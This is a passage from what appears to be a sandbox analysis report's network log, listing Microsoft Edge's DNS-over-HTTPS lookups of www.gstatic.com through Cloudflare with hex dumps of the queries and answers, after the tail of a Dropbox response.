                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:32 GMT
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: bc76296d6e874a4f9379e0c7a363dc77
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  15192.168.2.649803172.64.41.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c0e6aa6443e-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 df 00 04 8e fa 50 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomPc)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  16192.168.2.649804172.64.41.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c0e69f48c89-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 18 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  17192.168.2.649800162.159.61.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c0e89117ca0-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fc 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  18192.168.2.649799162.159.61.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c0e883f6a5f-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d5 00 04 8e fb 29 03 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom))


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  19192.168.2.649809172.64.41.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c0e8a1b5e80-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 fe 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom c)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  20192.168.2.649808172.64.41.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c0e8bcb7d26-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:32 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  21192.168.2.649813162.159.61.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:33 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c152d4f188d-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a3 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom#)


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  22192.168.2.649815172.64.41.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:33 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c170f5a8cc3-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 19 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  23192.168.2.649814172.64.41.34437692C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                  2024-12-19 12:44:33 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  Date: Thu, 19 Dec 2024 12:44:33 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                  CF-RAY: 8f477c16bd234372-EWR
                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
